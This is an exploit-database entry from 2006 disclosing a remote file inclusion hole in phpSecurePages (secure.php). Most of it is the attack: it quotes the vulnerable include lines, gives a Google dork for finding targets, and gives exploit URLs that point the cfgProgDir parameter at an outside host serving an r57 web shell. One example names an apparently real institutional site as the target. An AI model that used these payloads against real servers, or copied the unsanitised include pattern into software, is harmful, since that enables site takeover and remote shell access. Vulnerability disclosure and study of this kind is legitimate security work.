phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability

2006-09-28T00:00:00
ID 1337DAY-ID-904
Type zdt
Reporter D_7J
Modified 2006-09-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability
======================================================================



#==============================================================================================
#phpsecurepages (cfgProgDir) Remote File Include Vulnerability
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Version : all versions                                            
#                                                        
#================================================================================================
#
#Google Dork : inurl:"phpsecurepages"
#
#================================================================================================
#Bug in : /phpSecurePages/secure.php
#
#Vlu Code :
#--------------------------------
#
# 	include($cfgProgDir . "lng/" . $languageFile);
#	include($cfgProgDir . "session.php");
#
#	example:http://www.teilar.gr/services/noc/admin/phpSecurePages/secure.php?cfgProgDir=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/secure.php?cfgProgDir==http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)
#
#Greetz: All Iranian Hackers
# ==================================================================================================




#  0day.today [2018-01-10]  #